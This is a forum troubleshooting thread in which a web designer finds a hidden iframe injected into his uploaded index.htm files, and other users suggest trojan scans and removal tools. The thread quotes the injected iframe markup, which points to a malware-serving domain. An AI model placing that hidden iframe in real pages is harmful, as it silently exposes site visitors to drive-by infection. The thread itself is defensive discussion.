Hacked or Not?

3

3G_

Active Member
Joined
Jul 18, 2005
Messages
95
Reaction score
0
Hi guys

Please forgive me if Im posting this in the wrong thread...

I have the following situation:

I publish a website to my domain name.

After a few hours or a day, when I try to open the site it downloads very slowly or something is missing, etc... or sometimes the site is even still fine, but just loads slowly... then I notice it tries to download a script... called "http://mystats.biz/xxx/xxx.php"

I clicked to view the site's source code and voila, there was an iFrame added into my webpage (index.htm) that now tries to download that file!

It wasnt there when I published the file, so somehow it got there. I thought at first it was the server that was hacked but we tried it on several servers, international & local, and it happens to all of my sites I publish.

It cant be a thing on my PC because then it would be there straight after I published the file?!

Has anyone come across something like this? Google has no answer in english.

Regards
3G_
 
Something is amiss. Are you doing the actual hosting?
 
Sounds to me that the hosting provider is adding that frame by deafult to your page. Who is this host? Let us know please?
 
where you hosting? If its on one of those free servers (yahoo etc) they load up ad's with your webpages. It could well be that? Are you on a free hosted solution, or your own hosted server?
 
Hi guys

I have a few clients hosting on different servers, both abroad and locally. It seems like this happens only to sites that I upload via FTP from my PC, doesnt matter to which ISP it goes to.

This thing must come from my PC, however I cant understand how it works... I re-uploaded the one site's index.htm file (clean one) from my PC via FTP to the domain... after about 4 hours, I went to the site again and the script was added!

It looks like this when I view the source:

<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

It adds itself just beneath the "body background" html tag.

As I say, this MUST be going to the server from my PC as it happens on different hosts, and only on the ones I updated recently. The only thing that I cannot understand, is that I upload a clean file and after a while its infected.... very very strange indeed!

Im totally confused with this
 
What os are you using?

Can you try uploading from a different machine?
 
Need some input guys. I've been googling for the last 40 minutes ;)

http://forums.spikedhumor.com/showthread.php?t=4559

I see that after googlong tstats.biz, don't visit the tstats url, you will get infected.

I can't seem to narrow down the trojan, it's definitely a trojan.

AVG says this:

http://www.grisoft.com/doc/62/us/crp/0/idv/287339

It's very general, it's not much help to say the least.
My advice is to use the AVG removal utilities here:

http://www.grisoft.com/doc/63/us/crp/0

Use the vcleaner.exe (the first one) for Worm/Generic.FX

Also try the LOP.AH/Backdoor.Generic3.SVX

Hope you get it fixed. If anyone has more input? ;) :D :p
 
I'm browsing all over that redirect site with MSIE. Wonder what little bits of nasty I've been given :eek:

Doing a scan now. :)
 
bwana said:
I'm browsing all over that redirect site. Wonder what little bits of nasty I've been given :eek:

Doing a scan now. :)
Click to expand...

LOL! same here, I pray it has been fixed since then :p ;) I've got Avast Pro installed and it's quite an aggressive thing to have, it didn't shout or spit, so I think you're fine :p ;) :D
 
I know I'm fine - its a virtualised copy of xp. Going to trash it when I'm done playing. :)
 
Hey guys

Well I have to say - Thanks so much for the effort you are putting in to help me out here - you are most defs the best there is!! =)

I also found something you might want to read...

http://ethanzuckerman.com/blog/?p=1346

I have also found something when I googled for "iFrame virus" - they brought up the name "Bofra Worm"... which Symantec has a tool for. Im using that to scan now...

But I will also try the others that you guys gave, thanks again, you are awesome! =)

3G_
 
So are you running some sort of blog/cms site?
3G_ said:
Hey guys

Well I have to say - Thanks so much for the effort you are putting in to help me out here - you are most defs the best there is!! =)

I also found something you might want to read...

http://ethanzuckerman.com/blog/?p=1346

I have also found something when I googled for "iFrame virus" - they brought up the name "Bofra Worm"... which Symantec has a tool for. Im using that to scan now...

But I will also try the others that you guys gave, thanks again, you are awesome! =)

3G_
Click to expand...
 
Hi

Nope Im getting this on my regular static websites - basic sites I setup for clients and my own.

The code just magically appears in the HTML coding after a while... and that happens on any server that I publish the pages to.

3G_
 
3G_ said:
Hi

Nope Im getting this on my regular static websites - basic sites I setup for clients and my own.

The code just magically appears in the HTML coding after a while... and that happens on any server that I publish the pages to.

3G_
Click to expand...

Not to sound silly or anything, but you do realize the server is infected? :p That html code, connects to the tstats ip address and downloads the trojan to the server or pc, depends ;)
 
Yea I thought about the server being infected but....

1. I use different servers from different countries from different ISP's ;
2. We scanned some of the servers, nothing found ;
3. This only happens to the domains (index.htm file) that I update ;

This doesn't happen to (a) other accounts / domains on that server ;
This doesn't happen to (b) other accounts / domains I did not update ;

It only happens to domains that I recently updated and only appears in the homepage, ie: index.htm

Im still looking for answers to this mystery....


3G_
 
I cant understand how I can upload a clean html index.htm file and after a while its got the iFrame script embedded....

And that ONLY happens on the files I recently updated.

Total mystery.
 
You must log in or register to reply here.
Back
Top
Sign up to the MyBroadband newsletter
X